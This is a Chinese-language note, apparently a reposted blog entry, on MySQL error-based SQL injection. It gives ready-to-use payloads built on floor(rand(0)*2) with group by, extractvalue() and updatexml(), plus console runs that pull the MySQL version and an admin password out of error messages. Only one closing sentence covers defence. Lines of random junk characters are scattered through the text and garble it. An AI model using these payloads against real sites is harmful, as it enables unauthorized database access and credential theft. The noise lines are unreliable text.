放点原来的笔记。MySQL 在执行语句出错时会返回带有具体内容的错误信息,而 PHP+MySQL 架构的网站往往又把数据库错误原样显示在页面上,这样攻击者就可以构造如下三种"报错注入"方法,把想要查询的数据拼进错误信息里带出来。
实际测试环境:
5 c5 s4 `$ H- t) V
9 v: N. U) z/ d+ s8 h9 B9 I 7 y$ g4 w+ V' I* \8 X8 u* W; d( H+ ~ i& s
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
5 U: ^6 e7 {2 K
4 L1 F: z( k8 `- l$ p" W
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
; e. {8 X/ k& Q/ W$ @ `4 h
: x$ `) Y1 e4 g2 |# Q0 P, T9 Z # U# L3 _# S6 z6 x) N
+ |% c( E6 f \: F/ {6 M! J9 w4 H
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor() 报错(rand() + group by 触发主键重复)
可以使用如下利用语句(注入点在 WHERE 条件中,开头的 and 直接接在原查询之后):
1 F# r j7 `% L/ |8 G* Q8 A
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
2 _6 f- I' U1 g) V8 d: A 7 L6 U5 c$ ]" K7 J; v' ?3 k
3 F5 \9 }2 _: y( ~0 d$ Y, d) [' s
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:
: G, Q6 ]% Z/ W$ ^4 p1 Y 5 }$ D. [ w+ @6 n
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 参数存在注入,可以通过如下语句触发报错:
/ K, `) X3 A( H/ _' C9 Z 2 `/ p' m$ Z7 a# {; U
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了 MySQL 的版本(错误信息中版本号后面多出的那个 1 是 floor(rand(0)*2) 的值,读取时要去掉)。原理是 rand(0) 的随机序列是固定的,floor(rand(0)*2) 依次产生 0,1,1,0,1,1…;group by 在往临时表写入分组键时,对同一行"查找键是否存在"和"插入键"两次计算得到了不同的值,处理到第三行时会插入一个已经存在的 group_key,于是抛出 Duplicate entry,而键的内容正是我们拼进去的数据。因此被 group by 的派生表至少要有 3 行(information_schema.tables 肯定满足,Method2 里的三段 union 也是为此)。如果需要查询其他数据,把 version() 所在位置替换成对应的子查询即可。
例如我们需要查询管理员用户名和密码:
Method1:
6 _' @; h, _4 C% Z
% p2 E: n/ U. e; `
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2(密码为 admin888,末尾的 1 同样来自 floor(rand(0)*2)):
' S) x1 Z' [* @- M! V* B6 c
7 [8 ~: \* A* D& V
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、通过 extractvalue() 报错(需要 MySQL 5.1.5 及以上版本)
测试语句如下。0x5c 即反斜杠 "\",它使第二个参数成为非法的 XPath 表达式,MySQL 会把这段非法表达式原文放进错误信息里;注意 XPATH syntax error 只回显 32 个字符,更长的数据需要用 substr()/mid() 分段取出:
5 }+ v0 c i5 ?" q( S6 n+ p% }, ~
! g6 A: Q/ k' x$ D4 t8 o5 v2 l
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程:
8 \# o4 E7 H+ N. P 0 R& U' c/ B6 p
% w6 X" O6 l. J& j) [; u) X0 y
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、通过 updatexml() 报错(同样需要 MySQL 5.1.5 及以上,32 字符的回显限制同上)
测试语句如下。0x5e24 即 "^$",只是用来在回显中标记数据的起止,方便从错误信息里截取:
c& G& |/ O i: y X4 t ; ^ `' A4 a. [! o i4 _5 U' e! ~9 N
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程:
4 }: T( T7 P `; I0 F
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys. 补充一句防御:以上三种方法都依赖数据库错误信息被原样输出到页面,所以生产环境应关闭错误回显(不要把 MySQL 的报错直接打印给用户);而根本的修复是使用参数化查询/预处理语句,不要把用户输入直接拼接进 SQL。
/ g& u' W" _8 V/ _8 ~5 D) C* @
( h' E1 S$ H) ^ ^ |